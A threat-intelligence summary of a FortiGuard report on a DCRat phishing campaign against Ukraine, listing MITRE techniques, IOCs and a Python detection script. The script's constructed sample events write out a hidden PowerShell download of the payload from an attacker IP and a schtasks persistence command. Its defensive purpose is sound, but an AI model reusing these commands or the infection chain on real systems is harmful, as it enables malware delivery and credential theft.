Two Ukrainian targets were hit by emails delivering malicious documents that leveraged a Follina-like vulnerability and malicious macros to drop a DCRat variant. FortiGuard Labs notes the campaign revolves around Dark Crystal RAT (DCRat) with multi-stage infection, evasion techniques, and data-exfiltration goals. #DCRat #Follina
Keypoints
- Ukraine-focused campaign via emails containing a malicious document named “LIST_of_links_interactive_maps.docx” exploiting a then zero-day vulnerability (Follina) in MSDT.
- FortiGuard Labs also observed a related file with the same Ukrainian filename in Excel (.xlsx) format that uses malicious macros to trigger the payload.
- Macros drop and execute a batch (new.bat) which runs PowerShell to fetch MSDriverLoader.exe, then MSDriverMonitor.exe, which is the DCRat variant.
- DCRat (Dark Crystal RAT) is dropped as DllHelper.exe and injected into InstallUtil.exe for persistence and execution.
- The malware uses a multi-stage packer and anti-analysis checks (e.g., checks for computer names such as “Fortinet” and “TEQUILABOOMBOOM”) to hinder detection, including a fake MZ header in the second layer.
- C2 communication includes star-cz.ddns.net and IP 103.27.202.127; DCRat’s capabilities include keylogging, browser credential theft, screenshots, and data exfiltration with plugin support.
MITRE Techniques
- [T1566.001] Phishing – Delivery via email with malicious attachment. Quote: [‘targeted with emails containing a malicious document “LIST_of_links_interactive_maps.docx”’]
- [T1059.005] Visual Basic – Malicious macros in Excel (.xlsm) enabling execution. Quote: [‘Excel (xlsx) format and contains malicious macros…’]
- [T1059.001] PowerShell – Macro drops and executes PowerShell code to download payload. Quote: [‘PowerShell code that downloads MSDriverLoader.exe’]
- [T1105] Ingress Tool Transfer – Downloads MSDriverLoader.exe from a remote server. Quote: [‘downloads MSDriverLoader.exe from 72[.]167[.]223[.]219’]
- [T1055] Process Injection – DCRat code injected into a legitimate Windows process (InstallUtil.exe). Quote: [‘inject the DCRat code into a legitimate Windows .NET process, InstallUtil.exe’]
- [T1053.005] Scheduled Task – Creates a scheduled task (COMSurrogate) to persistently run DllHelper.exe. Quote: [‘scheduled task executes DllHelper.exe every time a user logs onto the system’]
- [T1071.004] DNS – C2 communication starts with a DNS lookup of the dynamic-DNS domain, followed by C2 traffic. Quote: [‘Initial DNS request to “star-cz[.]ddns[.]net” and subsequent C2 traffic.’]
- [T1056.001] Keylogging – Data collection via keystrokes. Quote: [‘Keylogging’]
- [T1113] Screen Capture – Taking screenshots. Quote: [‘Taking screenshots’]
- [T1555.003] Credentials from Web Browsers – Theft of cookies and browser credentials. Quote: [‘Stealing cookies, passwords, and form contents from installed web browsers’]
- [T1041] Exfiltration – Exfiltration of collected data to C2. Quote: [‘The primary focus of DCRat is data exfiltration’]
- [T1027] Obfuscated/Compressed Files and Information – Multi-layer packer with deceptive headers to hinder analysis. Quote: [‘packers… fake MZ header… steganography’]
- [T1562.001] Impair Defenses – Anti-analysis checks (Fortinet, TEQUILABOOMBOOM) during unpacking. Quote: [‘a lot of spaghetti code… computer names… “Fortinet” and “TEQUILABOOMBOOM”‘]
Indicators of Compromise
- [File IOCs] – 03700E0D02A6A1D76ECAA4D8307E40F76E07284646B3C45693054996F2E643D7, 24811E849A7A0E73788BC893BED81B88405883EB9114557EACD26A90C2A81C29, C84BBFCE14FDC65C6E738CE1196D40066C87E58F443E23266D3B9E542B8A583E
- [Network IOCs] – 72[.]167[.]223[.]219/MSDriverLoader.exe, 203[.]96[.]191[.]70/MSDriverMonitor.exe, star-cz[.]ddns[.]net, 103[.]27[.]202[.]127
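As an added example (not code from the Fortinet write-up), the infection chain and indicators above expressed as a defender's triage check over constructed Sysmon-style events: Excel spawning a shell, a PowerShell fetch of MSDriverLoader.exe from the listed IP, the COMSurrogate task launching DllHelper.exe, and a DNS lookup of the C2 domain. The event field names (host, type, parent, image, cmdline, query) are an assumed schema and the sample telemetry is constructed.

```python
import re
from collections import defaultdict
from typing import Dict, List

# IOCs as listed in the write-up (defanged); brackets are stripped for matching.
C2_DOMAIN = "star-cz[.]ddns[.]net".replace("[.]", ".")
BAD_IPS = {ip.replace("[.]", ".") for ip in
           ("72[.]167[.]223[.]219", "203[.]96[.]191[.]70", "103[.]27[.]202[.]127")}
PAYLOAD_RE = re.compile(r"MSDriver(?:Loader|Monitor)\.exe", re.IGNORECASE)

def classify(ev: Dict[str, str]) -> List[str]:
    """Return the chain stages one event matches ([] when nothing matched)."""
    hits: List[str] = []
    image = ev.get("image", "").lower()
    parent = ev.get("parent", "").lower()
    cmd = ev.get("cmdline", "")
    if ev.get("type") == "process":
        if parent.endswith("excel.exe") and image.endswith(("cmd.exe", "powershell.exe")):
            hits.append("macro-spawned-shell")      # macro runs new.bat / PowerShell
        if PAYLOAD_RE.search(cmd) and any(ip in cmd for ip in BAD_IPS):
            hits.append("stage1-download")          # MSDriverLoader/MSDriverMonitor fetch
        if image.endswith("schtasks.exe") and "comsurrogate" in cmd.lower() and "dllhelper.exe" in cmd.lower():
            hits.append("persistence-task")         # COMSurrogate task -> DllHelper.exe
    elif ev.get("type") == "dns" and ev.get("query", "").lower() == C2_DOMAIN:
        hits.append("c2-dns")                       # dynamic-DNS C2 lookup
    return hits

def triage(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Group stage hits per host; escalate hosts showing at least two distinct stages."""
    per_host = defaultdict(set)
    for ev in events:
        for stage in classify(ev):
            per_host[ev["host"]].add(stage)
    return {h: sorted(s) for h, s in per_host.items() if len(s) >= 2}

# Constructed sample telemetry (not real logs): the full chain on WS01, benign activity on WS02.
SAMPLE_EVENTS = [
    {"host": "WS01", "type": "process", "parent": r"C:\Program Files\Microsoft Office\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": r"cmd /c C:\Users\u\AppData\Local\Temp\new.bat"},
    {"host": "WS01", "type": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden ... DownloadFile('http://72.167.223.219/MSDriverLoader.exe', ...)"},
    {"host": "WS01", "type": "process", "parent": r"C:\Users\u\AppData\Roaming\MSDriverMonitor.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn COMSurrogate /sc onlogon /tr "C:\Users\u\AppData\Roaming\DllHelper.exe"'},
    {"host": "WS01", "type": "dns", "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "query": "star-cz.ddns.net"},
    {"host": "WS02", "type": "dns", "image": r"C:\Windows\System32\svchost.exe", "query": "update.example.com"},
]
# triage(SAMPLE_EVENTS) -> {'WS01': ['c2-dns', 'macro-spawned-shell', 'persistence-task', 'stage1-download']}
```

Requiring two distinct stages per host keeps a single benign lookalike (e.g. one Excel-spawned cmd.exe) from paging anyone, while any two links of this chain on one host are worth a look.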
Read more: https://www.fortinet.com/blog/threat-research/ukraine-targeted-by-dark-crystal-rat